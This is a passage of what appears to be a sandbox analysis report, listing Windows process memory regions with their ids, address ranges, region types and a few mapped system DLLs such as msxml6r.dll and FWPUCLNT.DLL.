"\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 6418 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 6419 start_va = 0x7170000 end_va = 0x726ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 6420 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6421 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6422 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6423 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6424 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6425 start_va = 0x10df0000 end_va = 0x10e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010df0000" filename = "" Region: id = 6426 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6427 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6428 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6429 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6430 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6431 start_va = 0x26c0000 end_va = 0x26e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 6432 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6433 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6434 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6435 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6436 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6437 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6438 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6439 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6440 start_va = 0x10e70000 end_va = 0x10eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e70000" filename = "" Region: id = 6441 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6442 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6443 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6444 start_va = 0x10ef0000 end_va = 0x10f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ef0000" filename = "" Region: id = 6445 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6446 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6447 start_va = 0x10f70000 end_va = 0x10feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f70000" filename = "" Region: id = 6448 start_va = 0x10ff0000 end_va = 0x1106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ff0000" filename = "" Region: id = 6449 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6450 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6451 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6452 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6453 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6454 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6455 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6459 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6460 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6461 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6462 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6465 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6466 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6467 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6468 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6469 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6470 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6471 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6472 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6473 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6474 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6475 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6476 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6497 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6498 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6499 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6515 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6540 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6541 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6542 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6543 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6558 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6559 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6560 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6561 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6565 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6566 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6567 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6568 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6588 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6589 start_va = 0x11070000 end_va = 0x110effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011070000" filename = "" Region: id = 6590 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6591 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6592 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6622 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6623 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6624 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6625 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6632 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6633 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6634 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6635 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6656 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6657 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6658 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6659 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6660 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6661 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6662 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6663 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6664 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6665 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6666 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6667 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6676 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6677 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6678 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6679 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6680 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6681 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6682 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6683 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6685 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6686 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6688 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6689 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6695 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6696 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6697 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6698 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6701 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6702 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6703 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6704 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6705 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6706 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6707 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6708 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6710 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6711 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6712 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6713 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6714 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6715 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6716 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6717 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6718 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6719 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6720 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6721 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6722 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6723 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6724 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6725 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6726 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6727 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6728 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6729 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6730 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6731 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6732 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6733 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6734 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6735 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6736 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6737 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6742 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6743 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6744 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6745 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6746 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6747 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6748 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6749 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6751 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6752 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6753 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6754 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6755 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6756 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6757 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 6758 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6759 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6760 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6762 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 6763 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6764 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6765 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6766 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6767 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6768 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6769 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6770 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6772 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6773 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6774 start_va = 0x7f10000 end_va = 0x8009fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f10000" filename = "" Region: id = 6777 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6778 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6779 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6781 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6782 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6783 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6784 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6785 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6786 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6787 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 6788 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 6790 start_va = 0x580000 end_va = 0x582fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6791 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6792 start_va = 0xbd70000 end_va = 0xc261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 6793 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 6794 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6795 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 6797 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6798 start_va = 0x2490000 end_va = 